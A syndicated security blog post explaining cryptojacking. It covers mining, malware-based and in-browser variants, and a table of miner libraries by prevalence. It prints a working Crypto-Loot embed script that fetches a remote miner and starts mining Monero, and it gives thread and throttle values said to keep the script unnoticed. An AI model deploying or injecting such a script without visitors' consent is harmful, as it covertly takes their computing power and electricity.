Cryptojacking, a Real Malware?
Before we begin, we need a brief definition of blockchain. It is simply
a unique, consensual, and distributed registry on the network that
allows storage of information that cannot be modified, lost or deleted.
It is used in the health sector, smart contracts, intellectual property
management, and cryptocurrencies, the last being its most common use.
In the field of cryptocurrencies, a blockchain stores all transactions
made with a cryptocurrency. The security and integrity of these systems
are maintained by nodes, which are computers connected to the blockchain
network competing with each other to verify transactions. This process
is known as mining and is carried out by providing processing power with
either CPUs, GPUs, or by using specialized hardware for this type of
task.
Usually nodes associate with each other and create groups that working
together help to validate a group of transactions. When these
transactions are validated, each node is rewarded with the proportion of
the power contributed.
Concept
When mining cryptocurrency, take into account that in these processes,
the percentage of GPU or CPU usage increases, as well as the use of
electricity.
Now, what if I tell you that others can perform such processing power
for you, and even better, without having to divide the profits between
them? It sounds pretty good, and it’s simple to implement with two
variations:
The first is carried out by infecting a victim’s machine with
malware. Usually, this is done by social engineering. We can make a
victim, without their knowledge, download malware that executes the
mining process in the background.The other variation is in-browser mining. This executes code in the
user’s browser when the user is accessing a particular site. In this
case,JavaScriptis used to execute such scripts.
Discussion
On one hand, some people prefer that their CPU be used 100% of the
time, without having to deal with ads and pop-ups on every new page.
On the other hand, antivirus companies periodically update their
definition of malware and include web miners as a potential threat to a
user’s system.
According to reports by COINTELEGRAPH[1], Monero
(the currency most affected by excessive mining) plans to reinforce its
algorithm by requiring miners to dedicate over two gigabytes of RAM to
the process, which could make cryptojacking attempts harder to hide.
How the scripts are used defines whether the usage is legal or not.
There are cases where attackers inject code into websites through XSS,
generating profits, but do not have the consent of the website
administrator.
As noted above, with social engineering techniques, the attacker could
make victims download malicious programs to perform mining without
consent.
Tools
There are many tools that can be used to perform in-browser mining.
Coinhive
had been one of the most used, but since March 2019 it has stopped
working.
However, there are other tools that are quite similar. Table 1 below, a
scan made with publicWWW, shows the
approximate number of websites using these tools.
Table 1. Quantity of websites per library[2]
| Website | Results | Query Parameter |
|---|---|---|
| Coinhive | 30611 | “coinhive.min.js” |
| JSEcoin | 1131 | “load.jsecoin.com” |
| Crypto-Loot | 695 | “CryptoLoot.Anonymous” |
| Minr | 324 | “minr.pw”, “st.kjli.fi”, “abc.pema.cl”, “metrika.ron.si”, “cdn.rove.cl”, “host.d-ns.ga”, “static.hk.rs”, “hallaert.online”, “cnt.statistic.date”, “cdn.static-cnt.bid” |
| CoinImp | 317 | “www.coinimp.com/scripts/min.js“ |
| ProjectPoi (PPoi) | 116 | “projectpoi.min” |
| AFMiner | 46 | “afminer.com/code/miner.php” |
| Papoto | 42 | “papoto.com/lib/papoto.js” |
In the following example, a test is shown using Crypto
Loot, a library that is replacing the previous
Coinhive. It is very easy to implement in any application by inserting
the following code.
In-Browser mining script.
<script src="//statdynamic.com/lib/crypta.js"></script><script> var miner = new CRLT.Anonymous('15837bc7758859e913c5ccc2d292a9f1e54775389d5', { threads:4,throttle:0.2, coin: "xmr" } ); miner.start();</script>When a user visits the application, the processing level quickly
increases. The recommended thread value to make the script unnoticed is
between 2-4. And the throttle that defines the maximum CPU usage is at
0.2 (80%), the full speed being 0.0, and the least recommended.
Figure 1. CPU Usage while visiting a website with In-Browser mining script.
Collected earnings and processing power can be seen on the
dashboard of the person who
inserted the script.
Conclusion
The use of services such as Crypto Loot can be
legal. They are considered malware when used anonymously in user’s
systems. It is our responsibility to inform users about what is
happening and provide statistics to users on mined power.
In order for these mining methods to be legitimate and therefore, legal,
users must receive a notification about the execution of these scripts,
as well as the option to disable them and stop mining.
So far, there are few websites where the user is not actually informed
of the use of these scripts. Here is where antivirus companies disagree.
Some antivirus companies believe excessive CPU usage can cause
intentional damage, while others believe there is no intention to harm
an infected machine’s files; they just make the machine work a little
slower.
Without a doubt, no one wants their machine to work slower, but with
proper configuration of the scripts, you can achieve a website that
generates profits without having to show annoying ads to visitors and
without exceeding CPU usage.
References
COINTELEGRAPH. Monero Developers Consider Adopting New
Proof-of-Work Algorithm in
October.S. Eskandari, A. Leoutsarakos, T. Mursch and J. Clark (2018). A
first look at browser-based
cryptojacking.
2018 IEEE European Symposium on Security and Privacy Workshops
(EuroS&PW), 63.
*** This is a Security Bloggers Network syndicated blog from Fluid Attacks RSS Feed authored by Diego Alvarez. Read the original post at: https://fluidattacks.com/blog/cryptojacking-malware/
